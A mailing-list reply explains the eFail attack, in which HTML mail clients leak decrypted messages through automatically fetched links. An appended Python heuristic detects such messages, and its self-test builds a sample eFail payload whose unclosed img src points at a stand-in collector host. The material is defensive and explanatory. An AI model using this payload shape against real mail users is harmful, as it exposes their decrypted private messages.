On Fri, Jun 29, 2018 at 10:05:47AM +0200, Aldo Maggi wrote:
> Ok, I understand your point, but, I wonder, are you using just lynx or
> links2 for going on Internet? The problems you correctly point out are
> not the same with Chromium, Firefox etc.?

I wouldn't be so sure about lynx et al. Here [1] is a rough but readable explanation on how eFail works. There are two components to it: (1) a format like HTML, in which the client possibly follows links without user interaction (more on that below) and (2) how to bury a MIME boundary within HTML's baroque syntax so that for the HTML parser, the whole (now decrypted) message forms part of that link, which will be "given" readily to a server out there, waiting to harvest it.

More on (1): the example uses an img tag. You might argue that HTML-capable mail readers have learnt these days to not follow automatically img tags (on privacy grounds), but there is a multitude of other links which might be followed automatically: CSS, iframes... Are you sure your l{ynx,inks} doesn't download any of them? Do you know by heart all of those? Do you even know where to look them up? [2]

I for one wouldn't know better than to look into lynx/links source code. Good luck with that.

Cheers

[1] https://thehackernews.com/2018/05/efail-pgp-email-encryption.html

[2] This isn't to make you look bad: I don't myself either! This is to drive home the message that "HTML" is a huge, ill-defined mess of standards, and that all HTML renderers out there have to be a steaming pile of pragmatism which is practically impossible to validate.

-- tomás
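The following is an added example, not part of the original post: a heuristic check a mail filter could run for component (2) described above, flagging a message in which an HTML part stops inside an open quoted attribute and an encrypted part follows it. The function names, the `sample` helper, and the `collector.example.invalid` host are assumptions made up for the illustration; the sample messages are constructed and carry placeholder ciphertext.

```python
import email
from email import policy

ENCRYPTED_TYPES = {"application/pkcs7-mime", "application/pgp-encrypted"}

def ends_inside_quoted_attribute(html):
    """Heuristic: True if the markup stops inside an open quoted attribute value."""
    in_tag, quote = False, None
    for ch in html:
        if quote:                       # inside a quoted value: only the same quote closes it
            quote = None if ch == quote else quote
        elif in_tag:
            if ch in "\"'":
                quote = ch
            elif ch == ">":
                in_tag = False
        elif ch == "<":
            in_tag = True
    return quote is not None

def is_encrypted(part):
    """True for S/MIME or PGP/MIME leaf parts and for inline-PGP text parts."""
    if part.get_content_type() in ENCRYPTED_TYPES:
        return True
    return (part.get_content_maintype() == "text"
            and "-----BEGIN PGP MESSAGE-----" in part.get_content())

def efail_suspect(raw):
    """True if an HTML part with an unterminated attribute precedes an encrypted part."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    leaves = [p for p in msg.walk() if not p.is_multipart()]
    for i, part in enumerate(leaves):
        if (part.get_content_type() == "text/html"
                and ends_inside_quoted_attribute(part.get_content())
                and any(is_encrypted(p) for p in leaves[i + 1:])):
            return True
    return False

def sample(first_html):
    """Constructed three-part message: HTML, placeholder ciphertext, HTML."""
    return (b'MIME-Version: 1.0\r\nContent-Type: multipart/mixed; boundary="B"\r\n\r\n'
            b"--B\r\nContent-Type: text/html\r\n\r\n" + first_html + b"\r\n"
            b"--B\r\nContent-Type: application/pkcs7-mime\r\n"
            b"Content-Transfer-Encoding: base64\r\n\r\nAAAA\r\n"
            b'--B\r\nContent-Type: text/html\r\n\r\n">\r\n--B--\r\n')

if __name__ == "__main__":
    print(efail_suspect(sample(b'<img src="http://collector.example.invalid/')))        # open quote
    print(efail_suspect(sample(b'<img src="http://collector.example.invalid/x.png">'))) # closed quote
```

The quote tracker does not understand HTML comments or script bodies, so a stray apostrophe inside `<!-- ... -->` can produce a false positive; treat a hit as a reason to quarantine and inspect, not as proof.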